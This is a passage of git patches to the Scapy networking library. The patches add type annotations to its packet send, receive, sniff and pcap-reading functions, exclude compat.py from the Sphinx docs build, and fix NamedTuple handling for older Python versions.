resolve_iface(iface or conf.iface) @@ -334,7 +401,11 @@ def _send(x, _func, inter=0, loop=0, iface=None, count=None, @conf.commands.register -def send(x, iface=None, *args, **kargs): +def send(x, # type: _PacketIterable + iface=None, # type: Optional[_GlobInterfaceType] + **kargs # type: Any + ): + # type: (...) -> Optional[PacketList] """ Send packets at layer 3 @@ -353,13 +424,20 @@ def send(x, iface=None, *args, **kargs): iface = _interface_selection(iface, x) return _send( x, - lambda iface: iface.l3socket(), iface=iface, - *args, **kargs + lambda iface: iface.l3socket(), + iface=iface, + **kargs ) @conf.commands.register -def sendp(x, iface=None, iface_hint=None, socket=None, *args, **kargs): +def sendp(x, # type: _PacketIterable + iface=None, # type: Optional[_GlobInterfaceType] + iface_hint=None, # type: Optional[str] + socket=None, # type: Optional[SuperSocket] + **kargs # type: Any + ): + # type: (...) -> Optional[PacketList] """ Send packets at layer 2 @@ -380,7 +458,6 @@ def sendp(x, iface=None, iface_hint=None, socket=None, *args, **kargs): return _send( x, lambda iface: iface.l2socket(), - *args, iface=iface, socket=socket, **kargs @@ -388,8 +465,17 @@ def sendp(x, iface=None, iface_hint=None, socket=None, *args, **kargs): @conf.commands.register -def sendpfast(x, pps=None, mbps=None, realtime=None, loop=0, file_cache=False, iface=None, replay_args=None, # noqa: E501 - parse_results=False): +def sendpfast(x, # type: _PacketIterable + pps=None, # type: Optional[float] + mbps=None, # type: Optional[float] + realtime=False, # type: bool + loop=0, # type: int + file_cache=False, # type: bool + iface=None, # type: Optional[_GlobInterfaceType] + replay_args=None, # type: Optional[List[str]] + parse_results=False, # type: bool + ): + # type: (...) -> Optional[Dict[str, Any]] """Send packets at layer 2 using tcpreplay for performance :param pps: packets per second @@ -450,7 +536,8 @@ def sendpfast(x, pps=None, mbps=None, realtime=None, loop=0, file_cache=False, i return results -def _parse_tcpreplay_result(stdout, stderr, argv): +def _parse_tcpreplay_result(stdout_b, stderr_b, argv): + # type: (bytes, bytes, List[str]) -> Dict[str, Any] """ Parse the output of tcpreplay and modify the results_dict to populate output information. # noqa: E501 Tested with tcpreplay v3.4.4 @@ -462,8 +549,8 @@ def _parse_tcpreplay_result(stdout, stderr, argv): """ try: results = {} - stdout = plain_str(stdout).lower() - stderr = plain_str(stderr).strip().split("\n") + stdout = plain_str(stdout_b).lower() + stderr = plain_str(stderr_b).strip().split("\n") elements = { "actual": (int, int, float), "rated": (float, float, float), @@ -494,7 +581,8 @@ def _parse_tcpreplay_result(stdout, stderr, argv): matches = re.search(regex, line) for i, typ in enumerate(_types): name = multi.get(elt, [elt])[i] - results[name] = typ(matches.group(i + 1)) + if matches: + results[name] = typ(matches.group(i + 1)) results["command"] = " ".join(argv) results["warnings"] = stderr[:-1] return results @@ -506,7 +594,15 @@ def _parse_tcpreplay_result(stdout, stderr, argv): @conf.commands.register -def sr(x, promisc=None, filter=None, iface=None, nofilter=0, *args, **kargs): +def sr(x, # type: _PacketIterable + promisc=None, # type: Optional[bool] + filter=None, # type: Optional[str] + iface=None, # type: Optional[_GlobInterfaceType] + nofilter=0, # type: int + *args, # type: Any + **kargs # type: Any + ): + # type: (...) -> Tuple[SndRcvList, PacketList] """ Send and receive packets at layer 3 """ @@ -517,14 +613,17 @@ def sr(x, promisc=None, filter=None, iface=None, nofilter=0, *args, **kargs): return result -def _interface_selection(iface, packet): +def _interface_selection(iface, # type: Optional[_GlobInterfaceType] + packet # type: _PacketIterable + ): + # type: (...) -> _GlobInterfaceType """ Select the network interface according to the layer 3 destination """ if iface is None: try: - iff = packet.route()[0] + iff = next(packet.__iter__()).route()[0] except AttributeError: iff = None return iff or conf.iface @@ -533,7 +632,15 @@ def _interface_selection(iface, packet): @conf.commands.register -def sr1(x, promisc=None, filter=None, iface=None, nofilter=0, *args, **kargs): +def sr1(x, # type: _PacketIterable + promisc=None, # type: Optional[bool] + filter=None, # type: Optional[str] + iface=None, # type: Optional[_GlobInterfaceType] + nofilter=0, # type: int + *args, # type: Any + **kargs # type: Any + ): + # type: (...) -> Optional[Packet] """ Send packets at layer 3 and return only the first answer """ @@ -543,12 +650,22 @@ def sr1(x, promisc=None, filter=None, iface=None, nofilter=0, *args, **kargs): ans, _ = sndrcv(s, x, *args, **kargs) s.close() if len(ans) > 0: - return ans[0][1] + return cast(Packet, ans[0][1]) + return None @conf.commands.register -def srp(x, promisc=None, iface=None, iface_hint=None, filter=None, - nofilter=0, type=ETH_P_ALL, *args, **kargs): +def srp(x, # type: Packet + promisc=None, # type: Optional[bool] + iface=None, # type: Optional[_GlobInterfaceType] + iface_hint=None, # type: Optional[str] + filter=None, # type: Optional[str] + nofilter=0, # type: int + type=ETH_P_ALL, # type: int + *args, # type: Any + **kargs # type: Any + ): + # type: (...) -> Tuple[SndRcvList, PacketList] """ Send and receive packets at layer 2 """ @@ -564,12 +681,14 @@ def srp(x, promisc=None, iface=None, iface_hint=None, filter=None, @conf.commands.register def srp1(*args, **kargs): + # type: (*Packet, **Any) -> Optional[Packet] """ Send and receive packets at layer 2 and return only the first answer """ ans, _ = srp(*args, **kargs) if len(ans) > 0: - return ans[0][1] + return cast(Packet, ans[0][1]) + return None # Append doc @@ -581,18 +700,27 @@ def srp1(*args, **kargs): # SEND/RECV LOOP METHODS -def __sr_loop(srfunc, pkts, prn=lambda x: x[1].summary(), - prnfail=lambda x: x.summary(), - inter=1, timeout=None, count=None, verbose=None, store=1, - *args, **kargs): +def __sr_loop(srfunc, # type: Callable[..., Tuple[SndRcvList, PacketList]] + pkts, # type: _PacketIterable + prn=lambda x: x[1].summary(), # type: Callable[[QueryAnswer], Any] # noqa: E501 + prnfail=lambda x: x.summary(), # type: Callable[[Packet], Any] + inter=1, # type: int + timeout=None, # type: Optional[int] + count=None, # type: Optional[int] + verbose=None, # type: Optional[int] + store=1, # type: int + *args, # type: Any + **kargs # type: Any + ): + # type: (...) -> Tuple[SndRcvList, PacketList] n = 0 r = 0 ct = conf.color_theme if verbose is None: verbose = conf.verb parity = 0 - ans = [] - unans = [] + ans = [] # type: List[QueryAnswer] + unans = [] # type: List[Packet] if timeout is None: timeout = min(2 * inter, 5) try: @@ -638,26 +766,46 @@ def __sr_loop(srfunc, pkts, prn=lambda x: x[1].summary(), @conf.commands.register -def srloop(pkts, *args, **kargs): - """Send a packet at layer 3 in loop and print the answer each time -srloop(pkts, [prn], [inter], [count], ...) --> None""" +def srloop(pkts, # type: _PacketIterable + *args, # type: Any + **kargs # type: Any + ): + # type: (...) -> Tuple[SndRcvList, PacketList] + """ + Send a packet at layer 3 in loop and print the answer each time + srloop(pkts, [prn], [inter], [count], ...) --> None + """ return __sr_loop(sr, pkts, *args, **kargs) @conf.commands.register -def srploop(pkts, *args, **kargs): - """Send a packet at layer 2 in loop and print the answer each time -srloop(pkts, [prn], [inter], [count], ...) --> None""" +def srploop(pkts, # type: _PacketIterable + *args, # type: Any + **kargs # type: Any + ): + # type: (...) -> Tuple[SndRcvList, PacketList] + """ + Send a packet at layer 2 in loop and print the answer each time + srloop(pkts, [prn], [inter], [count], ...) --> None + """ return __sr_loop(srp, pkts, *args, **kargs) # SEND/RECV FLOOD METHODS -def sndrcvflood(pks, pkt, inter=0, verbose=None, chainCC=False, timeout=None): +def sndrcvflood(pks, # type: SuperSocket + pkt, # type: _PacketIterable + inter=0, # type: int + verbose=None, # type: Optional[int] + chainCC=False, # type: bool + timeout=None # type: Optional[int] + ): + # type: (...) -> Tuple[SndRcvList, PacketList] """sndrcv equivalent for flooding.""" stopevent = Event() def send_in_loop(tobesent, stopevent): + # type: (_PacketIterable, Event) -> Iterator[Packet] """Infinite generator that produces the same packet until stopevent is triggered.""" while True: @@ -678,7 +826,15 @@ def send_in_loop(tobesent, stopevent): @conf.commands.register -def srflood(x, promisc=None, filter=None, iface=None, nofilter=None, *args, **kargs): # noqa: E501 +def srflood(x, # type: _PacketIterable + promisc=None, # type: Optional[bool] + filter=None, # type: Optional[str] + iface=None, # type: Optional[_GlobInterfaceType] + nofilter=None, # type: Optional[bool] + *args, # type: Any + **kargs # type: Any + ): + # type: (...) -> Tuple[SndRcvList, PacketList] """Flood and receive packets at layer 3 :param prn: function applied to packets received @@ -695,7 +851,15 @@ def srflood(x, promisc=None, filter=None, iface=None, nofilter=None, *args, **ka @conf.commands.register -def sr1flood(x, promisc=None, filter=None, iface=None, nofilter=0, *args, **kargs): # noqa: E501 +def sr1flood(x, # type: _PacketIterable + promisc=None, # type: Optional[bool] + filter=None, # type: Optional[str] + iface=None, # type: Optional[_GlobInterfaceType] + nofilter=0, # type: int + *args, # type: Any + **kargs # type: Any + ): + # type: (...) -> Optional[Packet] """Flood and receive packets at layer 3 and return only the first answer :param prn: function applied to packets received @@ -709,11 +873,21 @@ def sr1flood(x, promisc=None, filter=None, iface=None, nofilter=0, *args, **karg ans, _ = sndrcvflood(s, x, *args, **kargs) s.close() if len(ans) > 0: - return ans[0][1] + return cast(Packet, ans[0][1]) + return None @conf.commands.register -def srpflood(x, promisc=None, filter=None, iface=None, iface_hint=None, nofilter=None, *args, **kargs): # noqa: E501 +def srpflood(x, # type: _PacketIterable + promisc=None, # type: Optional[bool] + filter=None, # type: Optional[str] + iface=None, # type: Optional[_GlobInterfaceType] + iface_hint=None, # type: Optional[str] + nofilter=None, # type: Optional[bool] + *args, # type: Any + **kargs # type: Any + ): + # type: (...) -> Tuple[SndRcvList, PacketList] """Flood and receive packets at layer 2 :param prn: function applied to packets received @@ -732,7 +906,15 @@ def srpflood(x, promisc=None, filter=None, iface=None, iface_hint=None, nofilter @conf.commands.register -def srp1flood(x, promisc=None, filter=None, iface=None, nofilter=0, *args, **kargs): # noqa: E501 +def srp1flood(x, # type: _PacketIterable + promisc=None, # type: Optional[bool] + filter=None, # type: Optional[str] + iface=None, # type: Optional[_GlobInterfaceType] + nofilter=0, # type: int + *args, # type: Any + **kargs # type: Any + ): + # type: (...) -> Optional[Packet] """Flood and receive packets at layer 2 and return only the first answer :param prn: function applied to packets received @@ -746,7 +928,8 @@ def srp1flood(x, promisc=None, filter=None, iface=None, nofilter=0, *args, **kar ans, _ = sndrcvflood(s, x, *args, **kargs) s.close() if len(ans) > 0: - return ans[0][1] + return cast(Packet, ans[0][1]) + return None # SNIFF METHODS @@ -815,14 +998,16 @@ class AsyncSniffer(object): """ def __init__(self, *args, **kwargs): + # type: (*Any, **Any) -> None # Store keyword arguments self.args = args self.kwargs = kwargs self.running = False - self.thread = None - self.results = None + self.thread = None # type: Optional[Thread] + self.results = None # type: Optional[PacketList] def _setup_thread(self): + # type: () -> None # Prepare sniffing thread self.thread = Thread( target=self._run, @@ -833,24 +1018,35 @@ def _setup_thread(self): self.thread.setDaemon(True) def _run(self, - count=0, store=True, offline=None, - quiet=False, prn=None, lfilter=None, - L2socket=None, timeout=None, opened_socket=None, - stop_filter=None, iface=None, started_callback=None, - session=None, session_args=[], session_kwargs={}, - *arg, **karg): + count=0, # type: int + store=True, # type: bool + offline=None, # type: Any + quiet=False, # type: bool + prn=None, # type: Optional[Callable[[Packet], Any]] + lfilter=None, # type: Optional[Callable[[Packet], bool]] + L2socket=None, # type: Optional[Type[SuperSocket]] + timeout=None, # type: Optional[int] + opened_socket=None, # type: Optional[SuperSocket] + stop_filter=None, # type: Optional[Callable[[Packet], bool]] + iface=None, # type: Optional[_GlobInterfaceType] + started_callback=None, # type: Optional[Callable[[], Any]] + session=None, # type: Optional[_GlobSessionType] + session_kwargs={}, # type: Dict[str, Any] + **karg # type: Any + ): + # type: (...) -> None self.running = True # Start main thread # instantiate session if not isinstance(session, DefaultSession): session = session or DefaultSession session = session(prn=prn, store=store, - *session_args, **session_kwargs) + **session_kwargs) else: session.prn = prn session.store = store # sniff_sockets follows: {socket: label} - sniff_sockets = {} + sniff_sockets = {} # type: Dict[SuperSocket, _GlobInterfaceType] if opened_socket is not None: if isinstance(opened_socket, list): sniff_sockets.update( @@ -917,19 +1113,19 @@ def _run(self, L2socket = iface.l2listen() if isinstance(iface, list): sniff_sockets.update( - (L2socket(type=ETH_P_ALL, iface=ifname, *arg, **karg), + (L2socket(type=ETH_P_ALL, iface=ifname, **karg), ifname) for ifname in iface ) elif isinstance(iface, dict): sniff_sockets.update( - (L2socket(type=ETH_P_ALL, iface=ifname, *arg, **karg), + (L2socket(type=ETH_P_ALL, iface=ifname, **karg), iflabel) for ifname, iflabel in six.iteritems(iface) ) else: sniff_sockets[L2socket(type=ETH_P_ALL, iface=iface, - *arg, **karg)] = iface + **karg)] = iface # Get select information from the sockets _main_socket = next(iter(sniff_sockets)) @@ -942,23 +1138,25 @@ def _run(self, "The used select function " "will be the one of the first socket") - if nonblocking_socket: - # select is non blocking - def stop_cb(): - self.continue_sniff = False - self.stop_cb = stop_cb - close_pipe = None - else: + if not nonblocking_socket: # select is blocking: Add special control socket from scapy.automaton import ObjectPipe close_pipe = ObjectPipe() sniff_sockets[close_pipe] = "control_socket" def stop_cb(): + # type: () -> None if self.running: close_pipe.send(None) self.continue_sniff = False self.stop_cb = stop_cb + else: + # select is non blocking + def stop_cb(): + # type: () -> None + self.continue_sniff = False + self.stop_cb = stop_cb + close_pipe = None try: if started_callback: @@ -975,7 +1173,10 @@ def stop_cb(): remain = stoptime - time.time() if remain <= 0: break - sockets, read_func = select_func(sniff_sockets, remain) + sockets, read_func = select_func( + list(sniff_sockets.keys()), + remain + ) read_func = read_func or _backup_read_func dead_sockets = [] for s in sockets: @@ -1031,11 +1232,14 @@ def stop_cb(): self.results = session.toPacketList() def start(self): + # type: () -> None """Starts AsyncSniffer in async mode""" self._setup_thread() - self.thread.start() + if self.thread: + self.thread.start() def stop(self, join=True): + # type: (bool) -> Optional[PacketList] """Stops AsyncSniffer if not in async mode""" if self.running: try: @@ -1047,27 +1251,38 @@ def stop(self, join=True): if join: self.join() return self.results + return None else: raise Scapy_Exception("Not started !") def join(self, *args, **kwargs): + # type: (*Any, **Any) -> None if self.thread: self.thread.join(*args, **kwargs) @conf.commands.register def sniff(*args, **kwargs): + # type: (*Any, **Any) -> PacketList sniffer = AsyncSniffer() sniffer._run(*args, **kwargs) - return sniffer.results + return cast(PacketList, sniffer.results) sniff.__doc__ = AsyncSniffer.__doc__ @conf.commands.register -def bridge_and_sniff(if1, if2, xfrm12=None, xfrm21=None, prn=None, L2socket=None, # noqa: E501 - *args, **kargs): +def bridge_and_sniff(if1, # type: _GlobInterfaceType + if2, # type: _GlobInterfaceType + xfrm12=None, # type: Optional[Callable[[Packet], Union[Packet, bool]]] # noqa: E501 + xfrm21=None, # type: Optional[Callable[[Packet], Union[Packet, bool]]] # noqa: E501 + prn=None, # type: Optional[Callable[[Packet], Any]] + L2socket=None, # type: Optional[Type[SuperSocket]] + *args, # type: Any + **kargs # type: Any + ): + # type: (...) -> PacketList """Forward traffic between interfaces if1 and if2, sniff and return the exchanged packets. @@ -1090,7 +1305,11 @@ def bridge_and_sniff(if1, if2, xfrm12=None, xfrm21=None, prn=None, L2socket=None "bridge_and_sniff() -- ignoring it.", arg) del kargs[arg] - def _init_socket(iface, count, L2socket=L2socket): + def _init_socket(iface, # type: _GlobInterfaceType + count, # type: int + L2socket=L2socket # type: Optional[Type[SuperSocket]] + ): + # type: (...) -> Tuple[SuperSocket, _GlobInterfaceType] if isinstance(iface, SuperSocket): return iface, "iface%d" % count else: @@ -1108,13 +1327,14 @@ def _init_socket(iface, count, L2socket=L2socket): xfrms[if2] = xfrm21 def prn_send(pkt): + # type: (Packet) -> None try: - sendsock = peers[pkt.sniffed_on] + sendsock = peers[pkt.sniffed_on or ""] except KeyError: return if pkt.sniffed_on in xfrms: try: - newpkt = xfrms[pkt.sniffed_on](pkt) + _newpkt = xfrms[pkt.sniffed_on](pkt) except Exception: log_runtime.warning( 'Exception in transformation function for packet [%s] ' @@ -1123,10 +1343,12 @@ def prn_send(pkt): ) return else: - if newpkt is True: + if isinstance(_newpkt, bool): + if not _newpkt: + return newpkt = pkt - elif not newpkt: - return + else: + newpkt = _newpkt else: newpkt = pkt try: @@ -1140,6 +1362,7 @@ def prn_send(pkt): prn_orig = prn def prn(pkt): + # type: (Packet) -> Any prn_send(pkt) return prn_orig(pkt) @@ -1149,13 +1372,14 @@ def prn(pkt): @conf.commands.register def tshark(*args, **kargs): + # type: (Any, Any) -> None """Sniff packets and print them calling pkt.summary(). This tries to replicate what text-wireshark (tshark) would look like""" if 'iface' in kargs: iface = kargs.get('iface') elif 'opened_socket' in kargs: - iface = kargs.get('opened_socket').iface + iface = cast(SuperSocket, kargs.get('opened_socket')).iface else: iface = conf.iface print("Capturing on '%s'" % iface) @@ -1165,6 +1389,7 @@ def tshark(*args, **kargs): i = [0] def _cb(pkt): + # type: (Packet) -> None print("%5d\t%s" % (i[0], pkt.summary())) i[0] += 1 diff --git a/scapy/supersocket.py b/scapy/supersocket.py index 75eb1022fcb..526200584b9 100644 --- a/scapy/supersocket.py +++ b/scapy/supersocket.py @@ -20,14 +20,19 @@ from scapy.data import MTU, ETH_P_IP, SOL_PACKET, SO_TIMESTAMPNS from scapy.compat import raw from scapy.error import warning, log_runtime -from scapy.interfaces import network_name, NetworkInterface +from scapy.interfaces import network_name import scapy.modules.six as six from scapy.packet import Packet import scapy.packet -from scapy.plist import _PacketList, PacketList, SndRcvList +from scapy.plist import ( + PacketList, + SndRcvList, + _PacketIterable, +) from scapy.utils import PcapReader, tcpdump # Typing imports +from scapy.interfaces import _GlobInterfaceType from scapy.compat import ( Any, Iterator, @@ -35,7 +40,6 @@ Optional, Tuple, Type, - Union, cast, ) @@ -79,11 +83,18 @@ class SuperSocket: nonblocking_socket = False # type: bool auxdata_available = False # type: bool - def __init__(self, family=socket.AF_INET, type=socket.SOCK_STREAM, proto=0): # noqa: E501 - # type: (int, int, int) -> None + def __init__(self, + family=socket.AF_INET, # type: int + type=socket.SOCK_STREAM, # type: int + proto=0, # type: int + iface=None, # type: Optional[_GlobInterfaceType] + **kwargs # type: Any + ): + # type: (...) -> None self.ins = socket.socket(family, type, proto) # type: socket.socket self.outs = self.ins # type: Optional[socket.socket] self.promisc = None + self.iface = iface def send(self, x): # type: (Packet) -> int @@ -194,17 +205,17 @@ def close(self): self.ins.close() def sr(self, *args, **kargs): - # type: (Any, Any) -> Tuple[PacketList, PacketList] + # type: (Any, Any) -> Tuple[SndRcvList, PacketList] from scapy import sendrecv - ans, unans = sendrecv.sndrcv(self, *args, **kargs) # type: PacketList, PacketList # noqa: E501 + ans, unans = sendrecv.sndrcv(self, *args, **kargs) # type: SndRcvList, PacketList # noqa: E501 return ans, unans def sr1(self, *args, **kargs): # type: (Any, Any) -> Optional[Packet] from scapy import sendrecv - a, b = sendrecv.sndrcv(self, *args, **kargs) # type: PacketList, PacketList # noqa: E501 - if len(a) > 0: - pkt = a[0][1] # type: Packet + ans = sendrecv.sndrcv(self, *args, **kargs)[0] # type: SndRcvList + if len(ans) > 0: + pkt = ans[0][1] # type: Packet return pkt else: return None @@ -270,8 +281,14 @@ def __exit__(self, exc_type, exc_value, traceback): class L3RawSocket(SuperSocket): desc = "Layer 3 using Raw sockets (PF_INET/SOCK_RAW)" - def __init__(self, type=ETH_P_IP, filter=None, iface=None, promisc=None, nofilter=0): # noqa: E501 - # type: (int, Optional[Any], Optional[str], Optional[bool], int) -> None # noqa: E501 + def __init__(self, + type=ETH_P_IP, # type: int + filter=None, # type: Optional[str] + iface=None, # type: Optional[_GlobInterfaceType] + promisc=None, # type: Optional[bool] + nofilter=0 # type: int + ): + # type: (...) -> None self.outs = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW) # noqa: E501 self.outs.setsockopt(socket.SOL_IP, socket.IP_HDRINCL, 1) self.ins = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(type)) # noqa: E501 @@ -432,7 +449,7 @@ class L2ListenTcpdump(SuperSocket): desc = "read packets at layer 2 using tcpdump" def __init__(self, - iface=None, # type: Optional[Union[NetworkInterface, str]] + iface=None, # type: Optional[_GlobInterfaceType] promisc=False, # type: bool filter=None, # type: Optional[str] nofilter=False, # type: bool @@ -459,7 +476,7 @@ def __init__(self, if filter is not None: args.append(filter) self.tcpdump_proc = tcpdump(None, prog=prog, args=args, getproc=True) - self.reader = PcapReader(self.tcpdump_proc.stdout) # type: ignore + self.reader = PcapReader(self.tcpdump_proc.stdout) self.ins = self.reader # type: ignore def recv(self, x=MTU): @@ -486,7 +503,7 @@ class IterSocket(SuperSocket): nonblocking_socket = True def __init__(self, obj): - # type: (Union[Packet, List[Packet], _PacketList[Packet]]) -> None + # type: (_PacketIterable) -> None if not obj: self.iter = iter([]) # type: Iterator[Packet] elif isinstance(obj, IterSocket): @@ -502,8 +519,7 @@ def _iter(obj=cast(SndRcvList, obj)): self.iter = _iter() elif isinstance(obj, (list, PacketList)): if isinstance(obj[0], bytes): # type: ignore - # Deprecated - self.iter = (conf.raw_layer(x) for x in obj) + self.iter = iter(obj) else: self.iter = (y for x in obj for y in x) else: diff --git a/scapy/utils.py b/scapy/utils.py index a1a3fc51e99..3bdf833dee9 100644 --- a/scapy/utils.py +++ b/scapy/utils.py @@ -46,8 +46,8 @@ AnyStr, Callable, Dict, - Iterator, IO, + Iterator, List, Literal, Optional, @@ -55,13 +55,17 @@ Tuple, Type, Union, + overload, ) if TYPE_CHECKING: from scapy.packet import Packet - from scapy.plist import PacketList + from scapy.plist import _PacketIterable, PacketList + from scapy.supersocket import SuperSocket + _SuperSocket = SuperSocket +else: + _SuperSocket = object -_UniPacketList = Union[List["Packet"], "Packet", "PacketList"] _ByteStream = Union[IO[bytes], gzip.GzipFile] ########### @@ -159,7 +163,19 @@ def __eq__(self, other): return super(EDecimal, self).__eq__(other) or float(self) == other -def get_temp_file(keep=False, autoext="", fd=False): +@overload +def get_temp_file(keep, autoext, fd): + # type: (bool, str, Literal[True]) -> IO[bytes] + pass + + +@overload +def get_temp_file(keep=False, autoext="", fd=False): # noqa: F811 + # type: (bool, str, Literal[False]) -> str + pass + + +def get_temp_file(keep=False, autoext="", fd=False): # noqa: F811 # type: (bool, str, bool) -> Union[IO[bytes], str] """Creates a temporary file. @@ -1059,7 +1075,7 @@ def corrupt_bits(data, p=0.01, n=None): @conf.commands.register def wrpcap(filename, # type: Union[IO[bytes], str] - pkt, # type: _UniPacketList + pkt, # type: _PacketIterable *args, # type: Any **kargs # type: Any ): @@ -1095,6 +1111,14 @@ def rdpcap(filename, count=-1): return fdesc.read_all(count=count) +# NOTE: Type hinting +# Mypy doesn't understand the following metaclass, and thinks each +# constructor (PcapReader...) needs 3 arguments each. To avoid this, +# we add a fake (=None) to the last 2 arguments then force the value +# to not be None in the signature and pack the whole thing in an ignore. +# This allows to not have # type: ignore every time we call those +# constructors. + class PcapReader_metaclass(type): """Metaclass for (Raw)Pcap(Ng)Readers""" @@ -1168,7 +1192,7 @@ class RawPcapReader: PacketMetadata = collections.namedtuple("PacketMetadata", ["sec", "usec", "wirelen", "caplen"]) # noqa: E501 - def __init__(self, filename, fdesc, magic): + def __init__(self, filename, fdesc=None, magic=None): # type: ignore # type: (str, _ByteStream, bytes) -> None self.filename = filename self.f = fdesc @@ -1281,25 +1305,21 @@ def close(self): # type: () -> Optional[Any] return self.f.close() - def __enter__(self): - # type: () -> RawPcapReader - return self - def __exit__(self, exc_type, exc_value, tracback): # type: (Optional[Any], Optional[Any], Optional[Any]) -> None self.close() # emulate SuperSocket @staticmethod - def select(sockets, # type: Dict[RawPcapReader, str] - remain=None, # type: Optional[Any] + def select(sockets, # type: List[SuperSocket] + remain=None, # type: Optional[float] ): - # type: (...) -> Tuple[Dict[RawPcapReader, str], None] + # type: (...) -> Tuple[List[SuperSocket], None] return sockets, None -class PcapReader(RawPcapReader): - def __init__(self, filename, fdesc, magic): +class PcapReader(RawPcapReader, _SuperSocket): + def __init__(self, filename, fdesc=None, magic=None): # type: ignore # type: (str, IO[bytes], bytes) -> None RawPcapReader.__init__(self, filename, fdesc, magic) try: @@ -1313,6 +1333,10 @@ def __init__(self, filename, fdesc, magic): import scapy.packet # noqa: F401 self.LLcls = conf.raw_layer + def __enter__(self): + # type: () -> PcapReader + return self + def read_packet(self, size=MTU): # type: (int) -> Packet rp = super(PcapReader, self)._read_packet(size=size) @@ -1355,7 +1379,7 @@ class RawPcapNgReader(RawPcapReader): ["linktype", "tsresol", "tshigh", "tslow", "wirelen"]) - def __init__(self, filename, fdesc, magic): + def __init__(self, filename, fdesc=None, magic=None): # type: ignore # type: (str, IO[bytes], bytes) -> None self.filename = filename self.f = fdesc @@ -1501,14 +1525,18 @@ def read_block_pkt(self, block, size): wirelen=wirelen)) -class PcapNgReader(RawPcapNgReader): +class PcapNgReader(RawPcapNgReader, _SuperSocket): alternative = PcapReader - def __init__(self, filename, fdesc, magic): + def __init__(self, filename, fdesc=None, magic=None): # type: ignore # type: (str, IO[bytes], bytes) -> None RawPcapNgReader.__init__(self, filename, fdesc, magic) + def __enter__(self): + # type: () -> PcapNgReader + return self + def read_packet(self, size=MTU): # type: (int) -> Packet rp = super(PcapNgReader, self)._read_packet(size=size) @@ -1622,7 +1650,7 @@ def _write_header(self, pkt): self.f.flush() def write(self, pkt): - # type: (Union[_UniPacketList, bytes]) -> None + # type: (Union[_PacketIterable, bytes]) -> None """ Writes a Packet, a SndRcvList object, or bytes to a pcap file. @@ -1856,7 +1884,7 @@ def wireshark(pktlist, wait=False, **kwargs): @conf.commands.register def tdecode( - pktlist, # type: Union[IO[bytes], None, str, _UniPacketList] + pktlist, # type: Union[IO[bytes], None, str, _PacketIterable] args=None, # type: Optional[List[str]] **kwargs # type: Any ): @@ -1894,7 +1922,7 @@ def _guess_linktype_value(name): @conf.commands.register def tcpdump( - pktlist=None, # type: Union[IO[bytes], None, str, _UniPacketList] + pktlist=None, # type: Union[IO[bytes], None, str, _PacketIterable] dump=False, # type: bool getfd=False, # type: bool args=None, # type: Optional[List[str]] @@ -2080,7 +2108,7 @@ def tcpdump( stderr=stderr, ) elif use_tempfile: - pktlist = cast(Union[IO[bytes], _UniPacketList], pktlist) + pktlist = cast(Union[IO[bytes], "_PacketIterable"], pktlist) tmpfile = get_temp_file( # type: ignore autoext=".pcap", fd=True @@ -2090,7 +2118,7 @@ def tcpdump( iter(lambda: pktlist.read(1048576), b"") # type: ignore ) except AttributeError: - pktlist = cast(_UniPacketList, pktlist) + pktlist = cast("_PacketIterable", pktlist) wrpcap(tmpfile, pktlist, linktype=linktype) else: tmpfile.close() @@ -2153,9 +2181,9 @@ def tcpdump( @conf.commands.register def hexedit(pktlist): - # type: (_UniPacketList) -> PacketList + # type: (_PacketIterable) -> PacketList """Run hexedit on a list of packets, then return the edited packets.""" - f = get_temp_file() # type: str # type: ignore + f = get_temp_file() wrpcap(f, pktlist) with ContextManagerSubprocess(conf.prog.hexedit): subprocess.call([conf.prog.hexedit, f]) @@ -2456,7 +2484,7 @@ def whois(ip_address): class PeriodicSenderThread(threading.Thread): def __init__(self, sock, pkt, interval=0.5): - # type: (Any, _UniPacketList, float) -> None + # type: (Any, _PacketIterable, float) -> None """ Thread to send packets periodically Args: @@ -2465,7 +2493,7 @@ def __init__(self, sock, pkt, interval=0.5): interval: interval between two packets """ if not isinstance(pkt, list): - self._pkts = [cast("Packet", pkt)] # type: _UniPacketList + self._pkts = [cast("Packet", pkt)] # type: _PacketIterable else: self._pkts = pkt self._socket = sock From 7bc7e3105f079307da9ac3b774f362abd76a6ba9 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Fri, 29 Jan 2021 12:50:18 +0100 Subject: [PATCH 0490/1632] Ignore compat.py while building the doc Sphinx raises a warning on `typing.overload` that we cannot fix, because it's related to a dependency that is builtin :/ --- tox.ini | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/tox.ini b/tox.ini index 6cddece7f94..570e51492bc 100644 --- a/tox.ini +++ b/tox.ini @@ -75,7 +75,7 @@ skip_install = true changedir = doc/scapy deps = sphinx commands = - sphinx-apidoc -f --no-toc -d 1 --separate --module-first --templatedir=_templates --output-dir api ../../scapy ../../scapy/modules/ ../../scapy/libs/ ../../scapy/tools/ ../../scapy/arch/ ../../scapy/contrib/cansocket* ../../scapy/contrib/scada/* ../../scapy/all.py ../../scapy/layers/all.py + sphinx-apidoc -f --no-toc -d 1 --separate --module-first --templatedir=_templates --output-dir api ../../scapy ../../scapy/modules/ ../../scapy/libs/ ../../scapy/tools/ ../../scapy/arch/ ../../scapy/contrib/cansocket* ../../scapy/contrib/scada/* ../../scapy/all.py ../../scapy/layers/all.py ../../scapy/compat.py [testenv:mypy] From a1066ea3efb644bc5fb63e571376df461ea2c96d Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Tue, 26 Jan 2021 16:01:14 +0100 Subject: [PATCH 0491/1632] Fix NamedTuple for Python <= 3.6 --- scapy/compat.py | 9 +++++++-- 1 file changed, 7 insertions(+), 2 deletions(-) diff --git a/scapy/compat.py b/scapy/compat.py index e9aa1f3bd43..eef758fd08d 100644 --- a/scapy/compat.py +++ b/scapy/compat.py @@ -125,7 +125,6 @@ def __repr__(self): Iterator, IO, List, - NamedTuple, NewType, NoReturn, Optional, @@ -155,7 +154,6 @@ def cast(_type, obj): # type: ignore Iterator = _FakeType("Iterator") # type: ignore IO = _FakeType("IO") # type: ignore List = _FakeType("List", list) # type: ignore - NamedTuple = _FakeType("NamedTuple", collections.namedtuple) # type: ignore # noqa: E501 NewType = _FakeType("NewType") NoReturn = _FakeType("NoReturn") # type: ignore Optional = _FakeType("Optional") @@ -173,6 +171,13 @@ class Sized(object): # type: ignore overload = lambda x: x + +# Broken < Python 3.7 +if sys.version_info >= (3, 7): + from typing import NamedTuple +else: + NamedTuple = lambda name, params: collections.namedtuple(name, list(x[0] for x in params)) # noqa: 